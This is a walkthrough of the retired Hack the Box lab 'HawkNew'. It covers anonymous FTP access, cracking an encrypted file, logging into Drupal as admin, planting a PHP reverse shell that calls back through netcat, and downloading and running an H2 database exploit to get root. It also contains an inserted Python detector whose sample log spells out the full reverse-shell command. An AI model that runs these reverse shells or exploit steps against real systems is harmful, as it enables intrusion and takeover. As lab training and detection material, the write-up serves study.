Today we are going to solve another CTF challenge, “HawkNew”. HawkNew is a retired vulnerable lab presented by Hack the Box to help pentesters practise online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.
Level: Easy
Task: To find user.txt and root.txt
Note: Since these labs are available online, they have static IPs. The IP of HawkNew is 10.10.10.102
Penetration Methodology:
§ Port scanning and IP discovery
§ Anonymous FTP login
§ Checking file type
§ Getting login credentials
§ Browsing IP through port 80
§ Exploiting Drupal
§ Reading first flag user.txt
§ Getting login credentials
§ Spawning TTY shell
§ Searching exploit via Searchsploit
§ Getting root access
§ Reading final flag root.txt
Walkthrough
Let’s start off with our basic nmap command to find out the open ports and running services.
nmap -A 10.10.10.102
The Nmap output shows various open ports: 21 (ftp), 22 (ssh), 80 (http server running Drupal CMS), 8082 (H2 database HTTP console).
From the Nmap scan output we saw that FTP port 21 is open, and the next thing that catches our eye is that it has anonymous login allowed.
ftp 10.10.10.102
We easily connected to FTP through anonymous login. Moving on, after navigating through multiple directories we found a hidden file, “.drupal.txt.enc”, and transferred it to our local machine.
Since .drupal.txt.enc is encrypted, let’s check the file type using the ‘file’ command.
file .drupal.txt.enc
It came out to be OpenSSL encrypted data with a salted password. Clearly we need to decrypt the file to get any further clue.
To crack this file, we have used an openssl bruteforce tool which is easily available on GitHub. You can download it from the link given below, or run the following commands to download and execute the script.
git clone https://github.com/deltaclock/go-openssl-bruteforce.git
./openssl-brute --file /root/.drupal.txt.enc
Boom!! We have successfully cracked the file, and the password hint we got is “PencilKeyboardScanner123”. This could be the password for the CMS login; let’s check it.
As port 80 is running an HTTP server, we open the target machine’s IP address in our browser and find that it is a Drupal login page. To log in to this page we have used the basic username admin and the password PencilKeyboardScanner123.
Oh yeah!! We have successfully logged into the admin dashboard. Now go to Modules and enable the checkboxes for Path and PHP filter.
After that go to Content > Add Content > Basic Page to create a basic page where we can write malicious code to spawn the web shell. Just give any title for your malicious code.
Here we have written a one-liner PHP reverse shell with the help of the Pentest Monkey website.
&1|nc 10.10.14.10 1234 >/tmp/f"); ?>
Then select the text format as “PHP code”. Before saving it you should start a netcat listener on the listening port, so that once the code is executed it establishes a reverse connection.
nc -lvp 1234
We got a reverse connection from the victim’s machine on our netcat listener. To spawn a proper shell we have used the python3 /bin/bash one-liner.
python3 -c 'import pty;pty.spawn("/bin/bash")'
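A defender-side check, added here as an example (not code from the original post): it scans constructed process-command log lines for the FIFO/netcat reverse shell and the python pty.spawn TTY upgrade used above, and pulls out the remote host:port so the connection can be correlated with network logs. The rule names and the “user pid command” log format are assumptions of this example.

```python
# Flag reverse-shell and TTY-upgrade command patterns in process-command logs.
# Added example with constructed sample lines; not code from the original post.
import re
from typing import List, Tuple

# Constructed "user pid command" lines (as a process audit might log them).
SAMPLE_LOG = [
    "www-data 1312 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 1234 >/tmp/f",
    'www-data 1320 python3 -c import pty;pty.spawn("/bin/bash")',
    "daniel 1402 cat /var/www/html/sites/default/settings.php",
    "root 981 nc -lvp 8082",
    "www-data 1330 sh -c ls -la /home",
]

# nc/ncat/netcat, any arguments, then an IPv4 address and a port (the remote end).
NC_REMOTE_RE = re.compile(
    r"\b(?:nc|ncat|netcat)\b(?:\s+\S+)*?\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b"
)
# nc with -e: run a program and wire it to the socket.
NC_EXEC_RE = re.compile(r"\b(?:nc|ncat|netcat)\b[^|;]*\s-e\s")
# Python pty.spawn(...) one-liner used to upgrade a dumb shell to a TTY.
PTY_RE = re.compile(r"pty\.spawn\(")


def classify(cmd: str) -> Tuple[str, str]:
    """Return (rule, remote host:port or "") for one command, ("", "") if clean."""
    m = NC_REMOTE_RE.search(cmd)
    if "mkfifo" in cmd and re.search(r"\bsh -i\b", cmd) and m:
        # FIFO-backed reverse shell: interactive sh piped through nc to a remote host.
        return "fifo_reverse_shell", f"{m.group(1)}:{m.group(2)}"
    if NC_EXEC_RE.search(cmd):
        return "nc_exec", (f"{m.group(1)}:{m.group(2)}" if m else "")
    if PTY_RE.search(cmd):
        return "pty_upgrade", ""
    return "", ""


def scan(lines: List[str]) -> List[Tuple[int, str, str, str]]:
    """Scan "user pid command" lines; return (index, user, rule, detail) per hit."""
    findings = []
    for idx, line in enumerate(lines):
        parts = line.split(" ", 2)
        if len(parts) < 3:
            continue  # malformed line, skip it
        user, _pid, cmd = parts
        rule, detail = classify(cmd)
        if rule:
            findings.append((idx, user, rule, detail))
    return findings
```

Run `scan(SAMPLE_LOG)` to see both the web-server user’s reverse shell (with its remote 10.10.14.10:1234) and the TTY upgrade flagged, while the listener and ordinary commands pass.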
Inside /home/daniel we got the user.txt flag; now it is time to find the root flag. While exploring through directories, we thought of reading the contents of the “settings.php” file, and in this file we found the password: drupal4hawk
cat settings.php | grep Password
Then with the following command we switch user and log in as daniel.
su daniel
Password: drupal4hawk
Here we have used simple python3 commands to escape the python3 interpreter into a bash shell.
>>> import pty
>>> pty.spawn('/bin/bash')
From the Nmap scan output we noticed that an H2 database is running on port 8082, therefore we searched for an H2 database exploit in searchsploit.
searchsploit H2 database
It came out to be a remote code execution. The exploit we have used is highlighted; after that we copied the exploit 45506.py to the /root directory and ran a Python HTTP server to download the file onto the target machine.
searchsploit -m 45506
python -m SimpleHTTPServer 8080
Afterwards we downloaded our exploit 45506.py into the /tmp directory of the target machine, granted it full permissions and executed it with the following commands.
cd /tmp
wget http://10.10.14.10:8080/45506.py
chmod 777 45506.py
python3 45506.py -H 127.0.0.1:8082
id
Finally!! We have got the root access.
Now let’s go and get the “root.txt”.
We take a look at the content of the file and find our final flag.
Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles, contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst.